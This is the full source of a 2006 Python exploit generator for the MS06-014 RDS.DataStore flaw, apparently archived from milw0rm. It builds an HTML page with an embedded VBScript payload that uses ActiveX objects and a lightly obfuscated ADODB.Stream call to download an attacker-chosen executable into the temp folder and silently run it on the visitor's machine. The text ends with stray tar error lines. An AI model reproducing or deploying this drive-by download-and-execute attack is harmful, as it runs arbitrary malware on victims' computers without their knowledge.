Exploit.Python.Psyme.a - Source Code

1. #!/bin/sh -
2. "exec" "python" "-O" "$0" "$@"
3.  
4. __doc__ = """[BL4CK] - MS06-014
5.  
6. RDS.DataStore - Data Execution
7. CVS-2006-0003
8. MS06-014
9.  
10. April 2006
11.  
12. *** This is a bit outdated, but it works very well ***
13.  
14. Usage: ./bl4ck_ms06_014.py http://omfg.what.ho.st/~user/stage2.exe index.html
15.  
16. Now upload index.html to the same web server hosting your
17. http://omfg.what.ho.st/~user/stage2.exe
18.  
19.                            - redsand@blacksecurity.org
20. """
21.  
22. __version__ = "1.0"
23.  
24. import sys, random
25.  
26. class MS06014:
27.    
28.     __version = "'[BL4CK] MS06-014 " + __version__ + "\r\n"
29.  
30.  
31.     __html = """
32.    <title></title>
33.    <head></head>
34.  
35.    <body>
36.  
37.    <script language="VBScript">
38.  
39.    on error resume next
40.  
41.    BL4CK_PAYLOAD
42.  
43.    </script>
44.    <head>
45.    <title>[BL4CK] || 404 Not Found</title>
46.    </head><body>
47.    <h1>Not Found</h1>
48.    pwn3d!!
49.    <hr>
50.    <!-- <script>location.href='http://google.com'</script> -->
51.    </body>
52.  
53.    </html>
54.  
55.    """
56.  
57.     __payload = """
58.  
59.    ' due to how ajax works, the file MUST be within the same local domain
60.    dl = "URLFILE"
61.  
62.    ' create adodbstream object
63.    Set df = document.createElement("object")
64.    df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
65.    str="Microsoft.XMLHTTP"
66.    Set x = df.CreateObject(str,"")
67.  
68.    a1="Ado"
69.    a2="db."
70.    a3="Str"
71.    a4="eam"
72.    str1=a1&a2&a3&a4
73.    str5=str1
74.    set S = df.createobject(str5,"")
75.    S.type = 1
76.  
77.    ' xml ajax req
78.    str6="GET"
79.    x.Open str6, dl, False
80.    x.Send
81.  
82.    ' Get temp directory and create our destination name
83.    fname1="bl4ck.com"
84.    set F = df.createobject("Scripting.FileSystemObject","")
85.    set tmp = F.GetSpecialFolder(2) ' Get tmp folder
86.    fname1= F.BuildPath(tmp,fname1)
87.    S.open
88.    ' open adodb stream and write contents of request to file
89.    ' like vbs dl+exec code
90.    S.write x.responseBody
91.    ' Saves it with CreateOverwrite flag
92.    S.savetofile fname1,2
93.  
94.    S.close
95.    set Q = df.createobject("Shell.Application","")
96.    Q.ShellExecute fname1,"","","open",0
97.  
98.    """
99.  
100.     def __init__(self, file):
101.  
102.     self.__file = file
103.  
104.  
105.  
106.     def bl4ck(self):
107.     self.__payload = self.__payload.replace("URLFILE",self.__file)
108.  
109.     encoded = self.__payload
110.  
111.     ret = self.__html.replace("BL4CK_PAYLOAD",encoded)
112.  
113.     return ret
114.  
115.  
116. if __name__ == '__main__':
117.  
118.     url=False
119.     out=False
120.  
121.     print "[BL4CK] MS06-014 - redsand@blacksecurity.org"
122.     print "URL path to the file must be on the same domain as the HTM file"
123.     print "http://blacksecurity.org\r\n"
124.  
125.  
126.     argc = len(sys.argv)
127.     if(argc <= 2):
128.             print "USAGE: %s <download url> <outfile>" % sys.argv[0]
129.             sys.exit(0)
130.     if(argc > 1):
131.             url = sys.argv[1]
132.     if(argc > 2):
133.             out = sys.argv[2]
134.  
135.         ms = MS06014(url)
136.  
137.         ret = ms.bl4ck()
138.  
139.  
140.     try:
141.         fsock = open(out, "w+", 0)
142.         try:
143.             fsock.write(ret );
144.         finally:
145.             fsock.close()
146.     except IOError:
147.         pass
148.  
149.     print "Wrote %r bytes to: %s" % (len(ret),out)
150.  
151. # milw0rm.com [2006-07-21]
152. /bin/tar: Skipping to the next header
153. /bin/tar: Error exit delayed from previous errors